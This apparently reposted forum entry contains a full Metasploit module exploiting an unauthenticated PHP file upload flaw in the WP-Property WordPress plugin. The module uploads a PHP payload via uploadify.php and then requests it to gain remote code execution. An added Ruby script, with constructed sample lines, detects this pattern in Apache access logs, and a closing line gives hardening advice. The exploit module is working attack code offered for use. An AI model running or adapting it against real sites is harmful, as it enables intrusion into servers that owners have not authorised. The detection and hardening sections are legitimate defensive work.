WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the "Filedata" part carries the file, the "folder" part
    # tells uploadify.php where to store it.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # uploadify.php answers with the URI of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
```
Don't ask me what this is written in or how to use it; I mean msf.
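Added detection example, mine and not part of the original post or of Metasploit: it scans Apache combined-format access-log lines for the request pattern the module above produces (a POST to uploadify.php, then a GET of a freshly named .php file from the same uploadify directory) and reports source addresses that show both. The log lines and the addresses in them are constructed.

```ruby
# Added example, not part of the original post or of Metasploit: flag
# access-log entries matching the request pattern the module above produces.
# Constructed Apache combined-format sample lines (documentation IP ranges).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:51:30 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:51:31 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:51:32 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/xkqzr.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.2 - - [04/Jan/2013:19:52:00 +0800] "GET /wordpress/wp-admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  198.51.100.2 - - [04/Jan/2013:19:52:05 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
LOG

# Plugin directory the module's requests go to (taken from the module's URIs).
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}
# Apache combined format: ip ident user [time] "METHOD path proto" status ...
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Returns one hash per suspicious request. A POST to uploadify.php is an upload
# attempt (legitimate plugin use also POSTs here, so on its own it is a weak
# signal); a GET of any other .php file inside the uploadify directory means a
# script the plugin does not ship was fetched from there.
def scan_uploadify_log(text)
  hits = []
  text.each_line do |line|
    m = LINE_RE.match(line)
    next unless m
    path = m[:path].split('?').first
    next unless UPLOADIFY_DIR.match?(path)
    reason =
      if m[:method] == 'POST' && path.end_with?('/uploadify.php')
        :upload_attempt
      elsif m[:method] == 'GET' && path.end_with?('.php') && !path.end_with?('/uploadify.php')
        :dropped_php_executed
      end
    next unless reason
    hits << { ip: m[:ip], time: m[:time], path: path, status: m[:status].to_i, reason: reason }
  end
  hits
end

# Strong signal: the same source both uploaded and then fetched a .php file.
def attacker_ips(text)
  scan_uploadify_log(text).group_by { |h| h[:ip] }.select do |_ip, hs|
    reasons = hs.map { |h| h[:reason] }
    reasons.include?(:upload_attempt) && reasons.include?(:dropped_php_executed)
  end.keys
end

if __FILE__ == $0
  scan_uploadify_log(SAMPLE_LOG).each { |h| puts "#{h[:time]} #{h[:ip]} #{h[:reason]} #{h[:path]}" }
  puts "sources with upload + execution: #{attacker_ips(SAMPLE_LOG).join(', ')}"
end
```

Feed a real access log through `scan_uploadify_log(File.read(path))`; the hardening that removes the finding is deleting or access-restricting uploadify.php, since the log alone cannot tell an authenticated upload from an anonymous one.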